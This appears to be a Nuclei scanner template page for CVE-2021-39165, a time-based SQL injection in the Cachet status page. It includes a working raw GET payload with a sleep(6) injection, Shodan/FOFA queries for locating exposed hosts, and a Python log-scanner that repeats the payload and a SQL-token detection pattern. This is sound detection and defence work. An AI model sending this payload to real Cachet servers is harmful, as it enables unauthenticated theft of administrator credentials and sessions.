Cachet <=2.3.18 - SQL Injection
ID: CVE-2021-39165
Severity: medium
Author: tess
Tags: time-based-sqli,cve,cve2021,cachet,sqli,chachethq
Description
Cachet is an open source status page. Cachet versions up to and including 2.3.18 contain a SQL injection in SearchableTrait#scopeSearch(). An unauthenticated attacker can use it to exfiltrate sensitive data from the database, such as the administrator's password and session. The original Cachet repository, https://github.com/CachetHQ/Cachet, is not active; both the stable version 2.3.18 and its development 2.4 branch are affected.
YAML Source
id: CVE-2021-39165

info:
  name: Cachet <=2.3.18 - SQL Injection
  author: tess
  severity: medium
  description: |
    Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. The original repository of Cachet <https://github.com/CachetHQ/Cachet> is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Upgrade Cachet to a version higher than 2.3.18 or apply the necessary patches provided by the vendor.
  reference:
    - https://www.leavesongs.com/PENETRATION/cachet-from-laravel-sqli-to-bug-bounty.html
    - https://github.com/fiveai/Cachet/commit/27bca8280419966ba80c6fa283d985ddffa84bb6
    - https://github.com/W0rty/CVE-2021-39165/blob/main/exploit.py
    - https://nvd.nist.gov/vuln/detail/CVE-2021-39165
    - https://github.com/fiveai/Cachet/security/advisories/GHSA-79mg-4w23-4fqc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2021-39165
    cwe-id: CWE-287
    epss-score: 0.04209
    epss-percentile: 0.92226
    cpe: cpe:2.3:a:chachethq:cachet:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: chachethq
    product: cachet
    shodan-query: http.favicon.hash:-1606065523
    fofa-query: icon_hash=-1606065523
  tags: time-based-sqli,cve,cve2021,cachet,sqli,chachethq

http:
  - raw:
      - |
        @timeout: 20s
        GET /api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))-- HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "pagination") && contains(body, "data")'
        condition: and
# digest: 4b0a00483046022100afb2cba16c19926be00dcd3c7374083b67e994b81a47ae0fc235a4588b8f78e702210093f8c9c97c76a87db3c14622bd0611c73921f81200e437f6b9c8978af101e9ce:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-39165.yaml"
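
For reviewing access logs on a Cachet host, the following is an added example (not part of the template or of Cachet) that flags requests shaped like the one the template sends: an array-style query parameter under /api/v1/ whose value carries SQL syntax. It assumes combined-format access logs; the function name, the token list and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Sep/2021:10:00:01 +0000] "GET /api/v1/components?name=API HTTP/1.1" 200 512',
    '198.51.100.9 - - [01/Sep/2021:10:00:05 +0000] "GET /api/v1/components?name=1'
    '&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+\'a\'=\'a\')%20and%20(select%20sleep(6))--'
    ' HTTP/1.1" 200 498',
    '198.51.100.7 - - [01/Sep/2021:10:00:09 +0000] "GET /api/v1/incidents?per_page=5 HTTP/1.1" 200 733',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|DELETE) (\S+) HTTP/[\d.]+"')
INDEXED_KEY_RE = re.compile(r"^(.+)\[(\d+)\]$")  # array-style key, e.g. 1[3]
SQL_TOKEN_RE = re.compile(r"\b(?:select|sleep|benchmark|union)\b|--|[()']", re.I)


def suspicious_requests(lines, api_prefix="/api/v1/"):
    """Return one finding per array-style query parameter carrying SQL syntax."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.startswith(api_prefix):
            continue
        # parse_qsl percent-decodes keys and values and turns '+' into a space.
        params = parse_qsl(url.query, keep_blank_values=True)
        scalar_values = {v for k, v in params if not INDEXED_KEY_RE.match(k)}
        for key, value in params:
            indexed = INDEXED_KEY_RE.match(key)
            if indexed and SQL_TOKEN_RE.search(value):
                findings.append({
                    "client": line.split()[0],
                    "path": url.path,
                    "param": key,
                    "value": value,
                    # True when another parameter's value names this array,
                    # as name=1 does for 1[...] in the template's request.
                    "named_by_other_param": indexed.group(1) in scalar_values,
                })
    return findings


if __name__ == "__main__":
    for finding in suspicious_requests(SAMPLE_LOG):
        print(finding)
```

The token list is deliberately broad, so treat a finding as a lead to correlate with response time and source address rather than as proof of exploitation.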